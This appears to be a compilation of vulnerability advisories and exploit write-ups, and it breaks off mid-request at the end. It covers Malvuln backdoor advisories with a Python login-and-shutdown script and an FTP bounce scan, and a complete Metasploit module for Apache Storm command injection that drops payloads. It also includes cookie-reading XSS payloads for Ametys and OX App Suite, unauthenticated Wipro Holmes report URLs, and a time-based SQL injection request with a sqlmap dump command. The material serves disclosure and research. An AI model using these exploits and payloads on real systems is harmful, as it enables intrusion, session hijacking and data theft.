<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/5ff832ce6af4b03a709eaf380672cf34.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.DRA.c<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 3119 and authentication is required. However, the password "go" is weak and hardcoded in the PE file. The malware uses "lstrcmpa" Win32 API to check the password, when sending the password we need to be careful that there is no line feed "\n" E.g. "go\n", as what happens when sent using ncat or telnet causing authentication to fail.<br /><br />00401317 jz loc_401218<br />0040131D push offset aGo ; "go"<br />00401322 push offset buf ; lpString1<br />00401327 call lstrcmpA<br /><br />0040131D | 68 7C 40 40 00 | push backdoor.win32.dra.c.5ff832ce6af4b | 40407C "go"<br />00401322 | 68 8C 46 40 00 | push backdoor.win32.dra.c.5ff832ce6af4b |<br />00401327 | E8 F4 0C 00 00 | call <backdoor.win32.dra.c.5ff832ce6af4 |<br />0040132C | 83 F8 00 | cmp eax,0 |<br />0040132F | 74 2C | je backdoor.win32.dra.c.5ff832ce6af4b03 |<br />00401331 | 6A 00 | push 0 |<br />00401333 | 6A 11 | push 11 |<br />00401335 | 68 11 4C 40 00 | push backdoor.win32.dra.c.5ff832ce6af4b | 404C11 "invalid password."<br />0040133A | FF 35 16 4B 40 00 | push dword ptr ds:[404B16] |<br />00401340 | E8 53 0D 00 00 | call <backdoor.win32.dra.c.5ff832ce6af4 |<br />00401345 | 83 F8 FF | cmp eax,FFFFFFFF |<br /><br />Type: PE32<br />MD5: 5ff832ce6af4b03a709eaf380672cf34<br />Vuln ID: MVID-2022-0470<br />Disclosure: 01/24/2022<br /><br /><br />Exploit/PoC:<br />Using ncat, telnet will fail as it sends a new line "\n", so we use a makeshift Python agent.<br />Sending the command "Run z\r\n" will initiate a shutdown of the infected host.<br /><br />from socket import *<br />import time<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=3119<br /><br /><br />def conn():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /> return s<br /><br />def chk_res(s):<br /> res=""<br /> while True:<br /> res += s.recv(512)<br /> if "Connected :-) !" in res or "invalid password" in res:<br /> break<br /> return res<br /><br />def doit():<br /><br /> s=conn()<br /><br /> #Bad passwd<br /> PAYLOAD="hate\r\n"<br /> s.send(PAYLOAD)<br /> print(chk_res(s))<br /> s.close()<br /><br /> time.sleep(1)<br /><br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> #Correct passwd<br /> PAYLOAD="go"<br /> s.send(PAYLOAD)<br /> print(chk_res(s))<br /><br /> time.sleep(1)<br /><br /> #initiates a shutdown of the infected machine<br /> #s.send("Run c\r\n")<br /> s.send("Run z\r\n")<br /> <br /> s.close()<br /><br /><br />if __name__=="__main__":<br /> doit()<br /> print("Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/proto/thrift'<br />require 'rex/stopwatch'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /><br /> Thrift = Rex::Proto::Thrift<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm.<br /> The getTopologyHistory RPC method method takes a single argument which is the name of a user which is<br /> concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there<br /> must have been at least one topology submitted to the server. The topology may be active or inactive, but at<br /> least one must be present. Successful exploitation results in remote code execution as the user running Apache Storm.<br /><br /> This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0<br /> which is affected.<br /> },<br /> 'Author' => [<br /> 'Alvaro Muñoz', # discovery and original research<br /> 'Spencer McIntyre', # metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-38294'],<br /> ['URL', 'https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/']<br /> ],<br /> 'DisclosureDate' => '2021-10-25',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 6627,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> begin<br /> connect<br /> rescue Rex::ConnectionError<br /> return CheckCode::Unknown('Failed to connect to the service.')<br /> end<br /><br /> sleep_time = rand(5..10)<br /> response, elapsed_time = Rex::Stopwatch.elapsed_time do<br /> execute_command("sleep #{sleep_time}", { disconnect: false })<br /> recv_response(sleep_time + 5)<br /> end<br /> disconnect<br /><br /> vprint_status("Elapsed time: #{elapsed_time} seconds")<br /><br /> unless response && elapsed_time > sleep_time<br /> return CheckCode::Safe('Failed to test command injection.')<br /> end<br /><br /> CheckCode::Appears('Successfully tested command injection.')<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> # comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching<br /> cmd = "#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}"<br /> vprint_status("Executing command: #{cmd}")<br /><br /> send_request([<br /> Thrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'),<br /> Thrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: ";#{cmd}"),<br /> Thrift::Data.new<br /> ].map(&:to_binary_s).join)<br /> disconnect if opts.fetch(:disconnect, true)<br /> end<br /><br /> def send_request(request)<br /> connect if sock.nil?<br /> sock.put([ request.length ].pack('N') + request)<br /> end<br /><br /> def recv_response(timeout)<br /> remaining = timeout<br /> res_size, elapsed = Rex::Stopwatch.elapsed_time do<br /> sock.timed_read(4, remaining)<br /> end<br /><br /> remaining -= elapsed<br /> return nil if res_size.nil? || res_size.length != 4 || remaining <= 0<br /><br /> res = sock.timed_read(res_size.unpack1('N'), remaining)<br /><br /> return nil if res.nil? || res.length != res_size.unpack1('N')<br /><br /> return res_size + res<br /> rescue Timeout::Error<br /> return nil<br /> end<br />end<br /></code></pre>
<pre><code>Document Title:<br />===============<br />Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2275<br /><br /><br />Release Date:<br />=============<br />2022-01-12<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2275<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.2<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Build powerful and stunning websites. Whether you need an advanced corporate website, a powerful landing page, a professionnal blog or<br />an event website, all the tools to make creative digital experiences are at your fingertips with Ametys. No coding skills needed.<br />Ametys make it easy for everyone to create and manage unified digital platform. Ametys delivers simple and intuitive interface with<br />a familiar ribbon Office style interface.<br /><br />(Copy of the Homepage:https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the Ametys v4.4.1 cms web-application.<br /><br /><br />Affected Product(s):<br />====================<br />Ametys<br />Product: Ametys v4.4.1 - Content Management System (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-07-24: Researcher Notification & Coordination (Security Researcher)<br />2021-07-25: Vendor Notification (Security Department)<br />2021-**-**: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2022-01-12: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent script code injection web vulnerability has been discovered in the official Ametys v4.4.1 cms web-application.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise<br />browser to web-application requests from the application-side.<br /><br />The vulnerability is located in the input fields of the link text, small description and description in the add external link function.<br />The function is for example located in the link directory of the backend. Added links are listed with status and details.<br />Attackers with low privileges are able to add own malformed link with malicious script code in the marked vulnerable parameters.<br />After the inject the links are being displayed in the backend were the execute takes place on preview of the main link directory.<br />The attack vector of the vulnerability is persistent and the request method to inject is post.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects<br />to malicious source and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] Link Directory (Add)<br /><br />Vulnerable Function(s):<br />[+] add (External Link)<br /><br />Vulnerable Parameter(s):<br />[+] Link Text<br />[+] Small description<br />[+] Description<br /><br />Affected Module(s):<br />[+] Frontend (Main Link Listing)<br />[+] Backend (Link Directory)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent web vulnerability can be exploited by remote attackers with low privilged user accounts with low user interaction.<br />For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />1. Open the application path and login to the service as restricted user that allowed to create links<br />2. Open the link directory and create a new link (top|left)<br />3. Inject the test payloads to the link text, small description and description and save via post<br />4. On visit of the link directory the payloads executes in the backend listing or frontend<br />5. Successful reproduce of the persistent web vulnerability!<br /><br /><br />Payload(s):<br /><a onmouseover=alert(document.domain)>poc_link</a><br /><a onmouseover=alert(document.cookie)>poc_link</a><br /><br /><br />Vulnerable Source: Link Directory - Link (Add)<br />class="x-grid-cell-inner " style="text-align:left;"<br /><a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7478 x-unselectable"<br />style="width: 248px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7478"><div unselectable="on" class="x-grid-cell-inner "<br />style="text-align:left;"><a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7479<br />x-unselectable" style="width: 247px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7479"><div unselectable="on" class="x-grid-cell-inner "<br />style="text-align:left;">&nbsp;</div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7480 x-grid-cell-last x-unselectable" style="width:<br />148px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7480"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">&nbsp;<br /></div></td></tr></tbody></table><table id="tableview-7474-record-105" role="presentation" data-boundview="tableview-7474" data-recordid="105"<br />data-recordindex="1" class="x-grid-item x-grid-item-selected x-grid-item-alt" style=";width:0" cellspacing="0" cellpadding="0"><tbody><tr class="<br />x-grid-row" role="row"><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7475 x-grid-cell-first x-unselectable" style="width: 396px;"<br />role="gridcell" tabindex="-1" data-columnid="gridcolumn-7475"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;"><br /><span class="a-grid-glyph ametysicon-link23"></span>test.de</div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7476 x-unselectable"<br />style="width: 149px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7476"><div unselectable="on" class="x-grid-cell-inner "<br />style="text-align:left;">Normal</div></td><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://ametys.localhost:8000.localhost:8000/cms/plugins/core-ui/servercomm/messages.xml<br />Host: ametys.localhost:8000.localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------1197812616356669894551519312<br />Content-Length: 798<br />Origin: https://ametys.localhost:8000.localhost:8000<br />Connection: keep-alive<br />Referer: https://ametys.localhost:8000.localhost:8000/cms/www/index.html<br />Cookie: JSESSIONID=A1DC067A1739FDFBC72BCF921A5AA655;<br />AmetysAuthentication=YW1ldHlzX2RlbW9fdXNlcnMjd2VibWFzdGVyI1A5WndHNTNzNmJhYlRWSDI;<br />JSESSIONID=A0EC6E56FC3A2131C9D24C33CB9CCAAA<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />content={"0":{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-announcement/view.xml"},"1":<br />{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-startuptime.xml"}}&context.parameters=<br />{"siteName":"www","skin":"demo","debug.mode":"false","populationContexts":["/sites/www","/sites-fo/www"],"user":<br />{"login":"testuser_restricted","population":"ametys_demo_users","firstname":"testuser_restricted","lastname":"User","fullname":"testuser_restricted User",<br />"email":"testuser_restricted@test.com","populationLabel":"Ametys Demo Users","locale":"en"}}<br />-<br />POST: HTTP/1.1 200<br />Server: Apache/2.4.29 (Ubuntu)<br />X-Cocoon-Version: 2.1.13<br />Ametys-Dispatched: true<br />Content-Type: text/xml<br />Via: 1.1 ametys.localhost:8000.localhost:8000<br />Vary: Accept-Encoding<br />Content-Encoding: gzip<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Transfer-Encoding: chunked<br />Content-Language: fr<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The vulnerability can be patched by a secure parse and encode of the input fields in the external link add function of the link directory.<br />In a second step the input fields can be restricted for special chars to prevent further attacks.<br />As next step the output location were the links are being displayed (frontend & backend) should to be sanitized correctly.<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation web vulnerability in the ametys web-application cms is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Excel Report Download<br /># Date: 09/08/2021<br /># Exploit Author: Rizal Muhammed @ub3rsick<br /># Vendor Homepage: https://www.wipro.com/holmes/<br /># Version: 20.4.1<br /># Tested on: Windows 10 x64<br /># CVE : CVE-2021-38147<br /><br />In the Wipro Holmes Orchestrator 20.4.1 application, if at some point some user has exported any of the Reports as excel, these files remain in the server. When an unauthenticated user attempts to access any of the below endpoints such files are downloaded. Details of the vulnerable endpoints and the information exposed by the reports from these endpoints are provided below.<br /><br />User Report:-<br />API: http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/User_Report_Excel<br />Exposed Information: Username, Email, Role, First Name, Last Name, User Level and User Domain of different users.<br /><br />Domain Credentials Report:-<br />API: http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel<br />Exposed Information: Domain Credential Names, Type, Domain Names<br /><br />Other Endpoints:-<br />http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/Process_Report_Excel<br />http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/Infrastructure_Report_Excel<br />http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/Resolver_Report_Excel<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/fc100ff65f676a26293915407adc211c_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Lana.01.d<br />Vulnerability: Port Bounce Scan (MITM)<br />Description: The malware listens on TCP port 6666. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.<br />Type: PE32<br />MD5: fc100ff65f676a26293915407adc211c<br />Vuln ID: MVID-2022-0469<br />Dropped files: FTP.exe<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />nmap -n -Pn -b user:pass@192.168.18.129:6666 -p21,22,80 192.168.18.237 -v<br />Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-23 16:50 UTC-11<br />Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).<br />Attempting connection to ftp://user:pass@192.168.18.129:6666<br />Connected:220 Anal FTP v0.1<br />Login credentials accepted by FTP server!<br />Initiating Bounce Scan at 16:50<br />Discovered open port 80/tcp on 192.168.18.237<br />Completed Bounce Scan at 16:50, 2.14s elapsed (3 total ports)<br />Nmap scan report for 192.168.18.237<br />Host is up.<br /><br />PORT STATE SERVICE<br />21/tcp closed ftp<br />22/tcp closed ssh<br />80/tcp open http<br /><br />Read data files from: C:\Program Files (x86)\Nmap<br />Nmap done: 1 IP address (1 host up) scanned in 11.36 seconds<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Product: OX App Suite<br />Vendor: OX Software GmbH<br /><br /><br /><br />Internal reference: OXUIB-872<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev30, 7.10.4-rev27, 7.10.5-rev18<br />Vendor notification: 2021-06-01<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38374<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />The "app loader" mechanism of the frontend component could be abused to load content from relative URLs, outside of the intended code loading API path. This can be used by attackers to add references to malicious content that is served by the same domain.<br /><br />Risk:<br />Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. As attacker, upload a code snippet to drive and create a sharing link<br />2. Modify the "app loader" URL and include a relative reference to the shared code snippet<br />3. Embed a direct reference to this snippet at a malicious website or make a user follow the reference<br /><br />Solution:<br />We now restrict relative references to only include the intended API path.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1113<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21<br />Vendor notification: 2021-06-02<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38375<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />HTML E-Mails with lots of content are being truncated for improved performance. Their full content is being delivered when opening the HTML part at a dedicated browser tab. The mechanism that dealt with inline images allowed to inject script code as part of a HTML img "alt" tag.<br /><br />Risk:<br />Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to open the non-truncated representation of an E-Mail.<br /><br />Steps to reproduce:<br />1. Create a artifically large HTML E-Mail with script code at an images "alt" tag.<br />2. Deliver the mail and make the victim display the truncated part<br /><br />Proof of concept:<br /><img alt="src=foo.bar/onerror=alert('XSS')//" src=""><br /><br />Solution:<br />We updated the detection and sanitization logic to deal with embedded script code fragments.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1116<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21<br />Vendor notification: 2021-06-02<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38377<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />HTML E-Mails with lots of content are being truncated for improved performance. Their full content is being delivered when opening the HTML part at a dedicated browser tab. The mechanism that dealt with temporary internal transformation state allowed to inject script code by abusing a "anchor" HTML comment. The comments identifier is a predictable UUID and stores HTML transformation results, which is exempt from sanitization.<br /><br />Risk:<br />Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to open the non-truncated representation of an E-Mail.<br /><br />Steps to reproduce:<br />1. Create a artifically large HTML E-Mail with script code at an "anchor" comment<br />2. Deliver the mail and make the victim display the truncated part<br /><br />Proof of concept:<br /><!--anchor-5fd15ca8-a027-4b14-93ea-35de1747419e: <img src="" onerror="alert('XSS');">--><br /><br />Solution:<br />We now use a random value for temporary anchors to avoid exploiting this internal state.<br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1185<br />Vulnerability type: Information Disclosure (CWE-200)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21<br />Vendor notification: 2021-07-15<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38376<br />CVSS: 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />The "rampup" API action allows to swiftly extract a predefined set of information stored with a specific user session identifier to load generic information, for example available languages and folder names. It also contains a subset of personal information like a users name and mail address. However the call is not covered by standard authentication methods, allowing to extract this information when guessing or intercepting the users session identifier.<br /><br />Risk:<br />Unauthorized parties may get access to confidential non-public information, associated to a live user session. In order to gain access to the session identifer, an attacker requires access to infrastructure, log files or elevated privileges at either endpoints.<br /><br />Steps to reproduce:<br />1. Find out a users session identifier<br />2. Use the "rampup" action of the login API call to request session information<br /><br />Proof of concept:<br />https://example.com/appsuite/api/login?action=rampup&rampup=true&rampUpFor=open-xchange-appsuite&session=76b5b1ae9352b9a0b6d483b6f2f78c70<br /><br />Solution:<br />We applied standard authentication requirements for this API action.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1208<br />Vulnerability type: Information Disclosure (CWE-200)<br />Vulnerable version: 7.10.5<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21<br />Vendor notification: 2021-08-09<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38378<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />A caching mechanims for files in OX Drive did not consider the context identifier of a specific object.<br /><br />Risk:<br />Unauthorized users may get access to confidential information, like other users names, by observing the "modified by" response of the API for files that would collide with other users files that bear the same identifier. This weakness depends on chance and is limited to the names of users, there is no evidence that actual file content could have been exposed.<br /><br />Steps to reproduce:<br />1. Create multiple files in OX Drive on a environment with many contexts<br />2. Observe the "modified by" information which indicates who last changed the file<br />3. In rare cases where identifiers collided, other users surname and givenname were shown<br /><br />Solution:<br />We made the affected cache context-ware to avoid exposing this sort of information to unauthorized users.<br /><br /></code></pre>
<pre><code># Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated)<br /># Date: 19/01/2022<br /># Exploit Author: Felipe Alcantara (Filiplain)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Kali Linux<br /><br /># Steps to reproduce<br /># Log in as an employee<br /># Go to : http://localhost/ptms/?page=user<br /># Click Update<br /># Save request in BurpSuite<br /># Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump<br /><br />==========================<br />POST /ptms/classes/Users.php?f=save_employee HTTP/1.1<br />Host: localhost<br />Content-Length: 1362<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz<br />Origin: http://localhost<br />Referer: http://localhost/ptms/?page=user<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm<br />Connection: close<br /><br /><br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="id"<br /><br />4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="code"<br /><br />2022-0003<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="generated_password"<br /><br /><br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="firstname"<br /><br />Mark 2223<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: 